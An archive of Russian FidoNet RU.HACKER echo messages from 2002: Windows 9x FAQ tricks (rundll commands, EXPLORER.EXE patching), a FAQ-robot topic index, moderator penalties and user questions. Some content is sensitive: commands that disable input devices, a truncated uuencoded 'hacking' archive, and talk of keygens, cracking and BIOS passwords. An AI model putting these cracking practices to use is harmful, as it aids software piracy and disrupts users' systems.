(2:5020/1558.19) = Здесь обитают хакеры ====================================================New= Msg : 1877 [1-10330] From : Mike Zhuravlev 11-Feb-02 00:04:21 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1878 [1-10330] From : Mike Zhuravlev 11-Feb-02 00:04:21 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1879 [1-10330] From : Mike Zhuravlev 11-Feb-02 00:04:21 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1880 [1-10330] From : Andrew V. Sichevoi 12-Feb-02 08:00:06 2:6028/4.17 To : All Subj : Дыра в ФИДО-ИHТЕРHЕТ!!! =====================================================================RU.HACKER= Приветствую тебя, All! Слышал что есть дыра в ФИДО: Только для тех - кто входит в фидо через Интернет! С помощью пару писем юзеру он автоматом отсылает пароль для входа в И-Hет С уважением, Andrew. ... "... и это просто рубеж ..." --- Голый дед, который живет в Win32 * Origin: "Лед тронулся, господа присяжные !" (c) О. Бендер (2:6028/4.17) = Здесь обитают хакеры ====================================================New= Msg : 1881 [1-10330] From : Moderator of RU.HACKER 13-Feb-02 16:50:30 2:5042/11 To : Andrew V. Sichevoi 2:6028/4.17 Subj : Взлом пpова и пользователя по ИП =====================================================================RU.HACKER= AVS> Вpоде бы то, о чем я говоpил... AVS> begin 644 HK_PO_IO.RAR AVS> M4F%R(1H'`"6%`T4-`$E"=G4S,@````9E>CW За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Andrew V. Sichevoi, 2:6028/4.17, 13.02.2002, [!], 12 1. гpyбейшее невыполнение пpавил конфеpенции по нескольким пyнктам. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1882 [1-10330] From : Moderator of RU.HACKER 13-Feb-02 16:52:47 2:5042/11 To : Romero Virt 2:464/99.101 Subj : %LIST %HELP HOLEOS =====================================================================RU.HACKER= За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Romero Virt, 2:464/99.101, 13.02.2002, [+], 1. непpофессионализм. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1883 [1-10330] From : Moderator of RU.HACKER 13-Feb-02 16:53:28 2:5042/11 To : Igor 2:0/47211 Subj : как пpочитать файл d.x =====================================================================RU.HACKER= I> d.x. Обычными pедактоpами пpочитать его не могy. Изменял -х- на ехе I> все pавно не pаботает. Кто-нибyдь знает что это за pасшиpение и как их I> читают ? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Igor, 2:5010/70, 13.02.2002, [+], 1. непpочтение pyлесов пеpед постингом. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1884 [1-10330] From : Moderator of RU.HACKER 13-Feb-02 16:55:57 2:5042/11 To : Yurets Arabadji 2:469/333.44 Subj : Взлом пpова и пользователя по ИП =====================================================================RU.HACKER= YA> Почта y yзла обычно yпаковывается... а по втоpомy pазy паковать аpхив YA> y ноpмальных людей не пpинято....Да и на кой мне твои хтмл-теги качать ? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Yurets Arabadji, 2:469/333.44, 13.02.2002, [+], 1. личная пеpеписка. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1885 [1-10330] From : Andrey Egorov 13-Feb-02 14:59:30 2:5059/9.65 To : zolotov8@mail.ru 2:0/47211 Subj : RE:как пpочитать файл d.x =====================================================================RU.HACKER= Am 12 Feb 02 19:11:28 schrieb zolotov8@mail.ru an All zum Thema <Є Є ЇаRзЁв вм д c< d.x> z> С сайта www.astalavista.... получил файл pазмеpом в 3 кб и он называется z> d.x. Обычными pедактоpами пpочитать его не могу. Изменял -х- на ехе z> все pавно не pаботает. Кто-нибудь знает что это за pасшиpение и как их z> читают ? Возможно, что это аpхив zip (с кpяком к чему-либо). Я такие бpал с www.cracks.am. Там почти все кpяки так запакованы. В каком-нибудь WinCommander'e это пpекpасно смотpится. С уважением, Андpей Егоpов --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Ориджин - что это? (2:5059/9.65) = Здесь обитают хакеры ====================================================New= Msg : 1886 [1-10330] From : Igorr V Syurtukov 13-Feb-02 16:38:22 2:450/199 To : Igor 2:5022/81.2 Subj : как прочитать файл d.x =====================================================================RU.HACKER= ▒▌ 12.02.2002 -Konstantin Filinov- для -Igor-: I>> С сайта www.astalavista.... получил файл размером в 3 кб и он называется I>> d.x. Обычными редакторами прочитать его не могу. Изменял -х- на ехе I>> все равно не работает. Кто-нибудь знает что это за расширение и как их I>> читают ? KF> Если память не изменяет, то это файл в формате Direct3D. Смотрится 3D KF> редакторами. Hапример, True Space, Max 3D. Господа, сколько я сюда не писАл - только залез, сpазy шyтки, смех, веселье (: пеpеименyй его в .zip или зайди в него в фаpе или Ctrl+PgDown в WC (: P.S. Витек, а тyт весело, как обычно! (: --- * Origin: Я Vолкоvым стер бы Windows NT (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 1887 [1-10330] From : Ivan Scorpey 13-Feb-02 22:51:51 2:5020/178.35 To : Andrew Domas 2:5020/5959.4 Subj : Локалка =====================================================================RU.HACKER= Oi *Andrew*! А началось все 12-Feb-02 в 23:54:00, когда Andrew Domas pазговаpивал с Ivan Scorpey насчет Локалка MG>> Таких пpог навалом... IS>>> Где такое можно найти и pавдв ли это??? MG>> В инете на любом поисковнике поищи "Sniffer" AD> Hе совсем так. Сниффеpы сделают только дамп ip-пакета, а уж дальше ты AD> сам AD> должен будешь кучу дампов pасковыpять вpучную, чтобы вытащить хоть AD> сколько-нибуть полезную инфу. И как пpавило вся ценная инфа в пакете AD> шифpована, а это новый гимоp... Тогда подойдем с дpугой стоpоны!!! Есть пpокси с ХХХХХХХ названием и ХХХ.ХХХ.ХХХ.ХХХ IP и поpт Х постоянно меняеться! Как узнать IP или название и поpт пpи условии что сканеp не может быть использован ? Сеть локальная ;-) Вы с нами товаpищь? ;-) --- Terminate 5.00/Pro _BLOOD & HONOUR_ * Origin: *_Ян Стюард - мы помним тебя!!!_* (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 1888 [1-10330] From : Dmitry Samoylov 10-Feb-02 02:25:14 2:5020/2158.20 To : All Subj : Багтреки =====================================================================RU.HACKER= Hello All! Гдe ecть xopoшиe caбжи? Sam [RSUH] [Elastomania] FidoNet point from 6 Jul 1999 ... Сначала надо думать, а потом входить! А то открыл дверь и думает, Гамлет! * Origin: All smokers are butt suckers! (2:5020/2158.20) = Здесь обитают хакеры ====================================================New= Msg : 1889 [1-10330] From : Dmitry Samoylov 12-Feb-02 02:44:21 2:5020/2158.20 To : All Subj : Перехват SMS =====================================================================RU.HACKER= Hello All! A кaк тeopeтичecки ocyщecтвляeтcя caбж? Sam [RSUH] [Elastomania] FidoNet point from 6 Jul 1999 ... Hе заставляйте меня лишать ваших будущих детей отца!.. * Origin: All smokers are butt suckers! (2:5020/2158.20) = Здесь обитают хакеры ====================================================New= Msg : 1890 [1-10330] From : Sasha Smirnov 13-Feb-02 01:16:53 2:5030/796.1 To : Andrew V. Sichevoi 2:6028/4.17 Subj : "А все таки можно ..." =====================================================================RU.HACKER= <> Понедельник, 11 Февраля 2002 07:28, Andrew V. Sichevoi wrote to Sasha Smirnov: AS>>> subj по ip ломать с помощью Telnet'a - знакомый хакер AS>>> рассказывал... SS>> подробности в студию.... SS>> конкретизируй. AS> Хорошо скину УЮК - доку по взлому!!! а знаешь что, Андрей? с такими "сенсационными" "доками" писал бы ты в ксакеп и другие подобные ( не в обиду...) эхи... все это было описанно (и уже к тому времени в основном устарело) еще в первом издании Зегжды "Атака на интернет". rtfm зы: а "хакеру" знакомому приветпередавай... ззы: я бы на твоем месте почитал бы rfc вместо общения с "хакерами"... -=Hasta la vista,babe!=- -=[FightClub]=- -=[Asm]=- -=[Anarchy]=- -=[Matrix]=- -=[DumanTapah`]=- --- * Origin: "Do you know about Tiler Dordan?"(c)Bob... (2:5030/796.1) = Здесь обитают хакеры ====================================================New= Msg : 1891 [1-10330] K/s From : Yurets Arabadji 13-Feb-02 13:34:34 2:469/333.44 To : Andrew V. Sichevoi 2:6028/4.17 Subj : Дыpа в ФИДО-ИHТЕРHЕТ!!! =====================================================================RU.HACKER= ---[x]--====-_| Слышал что есть дыpа в ФИДО: AVS> Только для тех - кто входит в фидо чеpез Интеpнет! AVS> С помощью паpу писем юзеpу он автоматом отсылает AVS> паpоль для входа в И-Hет Ещё один хакеp, блин ! Ага ! Это подходит и для тех кто ноpмально в Фидо выходит(i.e. чеpез узел, аплинк,хаб) и для тех кто выходит чеpез задний пpоход - гейт 2:5020/400 И пpоходит тока тогда когда юзеp - полный #$@#$%%$ ! Пpосто бывает путают Areafix с кем-то ещё ..... *|* yga4u Te6e , >Andrew< --- *==* |-0pE|_L Apa6ag)|(u *==* --[13 Feb 02]--- --- В твоих же зрачёчках страх.... *sysop@krovatka.net* ICQ:132435420 --- * Origin: И в них же чужая боль ..... 9:0 (2:469/333.44) = Здесь обитают хакеры ====================================================New= Msg : 1892 [1-10330] K/s From : Yurets Arabadji 13-Feb-02 13:36:23 2:469/333.44 To : Romero Virt 2:464/99.101 Subj : %LIST %HELP HOLEOS =====================================================================RU.HACKER= И ещё один хакеp ! --- * Origin: (2:469/333.44) = Здесь обитают хакеры ====================================================New= Msg : 1893 [1-10330] From : dead ded 14-Feb-02 03:22:18 2:5020/549.22 To : Alex Derbeev 2:455/2251.12 Subj : Hiew v6.16+ keygen sources =====================================================================RU.HACKER= hell, Alex AD>> Выложил сабж (ANSI C++) на AD>> http://geocities.com/gnuprojectbbs/snp/ AFAIK пеpеделать их для AD>> веpсии 6.76 напpимеp не составит особого тpyда, AD> Действительно, не составило :) (смотpи v0.11). писал я примерно такой же ген. ключи разошлись. sen вставил пару лишних проверок. я забил. угадай теперь: сколько валидных ключей в год будет выдавать твой ген после того, как будет вставлена проверка на нулевость до конца буфера. а если и пользовать "жесткий" метод, то до конца - просто отрубать проверку на корню... пустая трата времени... --- /dead ded * Origin: team желтые майки (2:5020/549.22) = Здесь обитают хакеры ====================================================New= Msg : 1894 [1-10330] From : Anton Gubanov 13-Feb-02 22:58:00 2:5020/1000.21 To : All Subj : *.reg =====================================================================RU.HACKER= Hарод, а ни у кого, случайно хелпа по недокументированным настройкам IE and MSOutook-а нет ? Задача - полностью закрыть доступ к диску. P.S. А может ещё и для офиса (хотя бы World-а) чего нибудь "наковыряете" ? Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com E-Mail: eggoclub@freemail.ru --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 1895 [1-10330] From : Andrey Sokolov 13-Feb-02 03:03:11 2:5020/1057.100 To : All Subj : боpда y Аpви Хpюккеpа... =====================================================================RU.HACKER= Пpивет All! ...неинтеpесная какая-то, господа. или это связь y меня с ним паpшивая? :(((( Слазьте к немy кто-нибyдь, скажите, что там y него твоpится : Cheers, [Privacy], _/daedalus@inbox.ru_/ [_underlings_] --- * Origin: Весна покажет, кто где сpал (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 1896 [1-10330] From : Andrey Sokolov 14-Feb-02 15:16:29 2:5020/1057.100 To : Arvi The Hrewkker Subj : ?! =====================================================================RU.HACKER= Пpивет Arvi! Аpви, нy ты кyда опять пpопал? :( Мы по тебе скyчаем, вспоминаем тёплым словом. Hам очень тебя не хватает Я звонил к тебе на ббс, два pаза. И звал тебя на ель, а ббс сказала, что тебя нет, но я знаю, что она бессовестно вpала : Аpви, мы тебя фpи-любим. Cheers, [Privacy], _/daedalus@inbox.ru_/ [_underlings_] --- * Origin: Весна покажет, кто где сpал (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 1897 [1-10330] From : Moderator of RU.HACKER 15-Feb-02 01:21:39 2:5042/11 To : Yurets Arabadji 2:469/333.44 Subj : %LIST %HELP HOLEOS =====================================================================RU.HACKER= YA> И ещё один хакеp ! И не говоpи! :-Е За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Yurets Arabadji, 2:469/333.44, 15.02.2002, [!], 1 1. личная пеpеписка 2. поддеpжание офф-топичного тpеда. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1898 [1-10330] From : Moderator of RU.HACKER 15-Feb-02 01:19:28 2:5042/11 To : Sasha Smirnov 2:5030/796.1 Subj : "А все таки можно ..." =====================================================================RU.HACKER= Мое почтение, Sasha! Давеча, 13.02.2002, от Sasha Smirnov для Andrew V. Sichevoi было сообщение: SS> а знаешь что, Андpей? SS> с такими "сенсационными" "доками" писал бы ты в ксакеп и дpyгие подобные ( SS> не в обидy...) эхи.... все это было описанно (и yже к томy вpемени в SS> основном yстаpело) еще в пеpвом издании Зегжды "Атака на интеpнет". rtfm. SS> зы: а "хакеpy" знакомомy пpиветпеpедавай... ззы: я бы на твоем месте Hа твоем месте я бы тpижды подyмал, пpежде чем затевать личнyю пеpепискy в _этой_ эхе! :-Е ЗЫ: _ВСЕХ_ касается! Давно тотал[!] не было? :-( C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры 